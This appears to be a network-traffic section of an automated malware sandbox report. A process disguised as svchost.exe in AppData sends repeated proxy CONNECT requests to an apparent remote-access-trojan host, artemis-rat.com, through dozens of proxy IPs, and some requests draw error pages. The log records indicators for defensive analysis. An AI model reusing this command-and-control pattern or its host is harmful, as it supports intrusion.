                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3406192.168.2.560857106.105.218.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.848514080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3407192.168.2.560800211.93.2.190730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.866332054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.358652115 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3408192.168.2.559572162.241.50.1795375543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.877289057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3409192.168.2.559545198.12.255.1932278543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.889045954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3410192.168.2.560513199.58.184.97414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.912493944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3411192.168.2.560876103.66.177.173225143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.922122002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.760879993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3412192.168.2.56089452.172.1.1868043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.925997019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3413192.168.2.5609181.15.62.12567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.957685947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3414192.168.2.55649431.200.242.2011575543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.957932949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3415192.168.2.56037418.167.191.223108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.957933903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3416192.168.2.55826347.251.34.170108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.964687109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3417192.168.2.559190184.170.248.5414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.968281984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3418192.168.2.556490203.96.177.2115500543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.973156929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3419192.168.2.560725111.53.178.249730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.978349924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3420192.168.2.55650362.176.12.111808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.996746063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3421192.168.2.560745180.250.159.49415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.000833988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.253869057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3422192.168.2.555427101.255.165.130111143220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.006418943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.847940922 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3423192.168.2.558299195.235.124.1438043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.008151054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3424192.168.2.556491193.239.56.84808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.010257006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3425192.168.2.556825162.240.231.2116058943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.021218061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3426192.168.2.56033862.103.186.66415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.022974014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3427192.168.2.556433103.13.204.24808243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.025702000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3428192.168.2.560173174.75.211.222414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.058125019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3429192.168.2.56092043.155.170.351567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.087496996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3430192.168.2.556673103.126.219.37808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.114518881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3431192.168.2.56049145.65.137.21899943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.114871025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.594254017 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3432192.168.2.560941172.67.255.2248043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.115858078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.269961119 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:36 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3433192.168.2.556886147.124.212.312423043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.161000967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3434192.168.2.560676199.102.106.94414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.166007996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3435192.168.2.556867162.240.231.2116041543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.167314053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3436192.168.2.560505107.148.201.1578043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.167315006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3437192.168.2.56045178.30.128.10808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.168982983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3438192.168.2.560333119.18.149.34808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.168983936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3439192.168.2.556741146.59.18.2461586043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.169281960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3440192.168.2.56092461.178.152.31730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.184458971 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:36.540769100 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3441192.168.2.560798117.160.250.132889943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.184467077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.887953997 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:36 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3442192.168.2.560926119.3.215.41888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
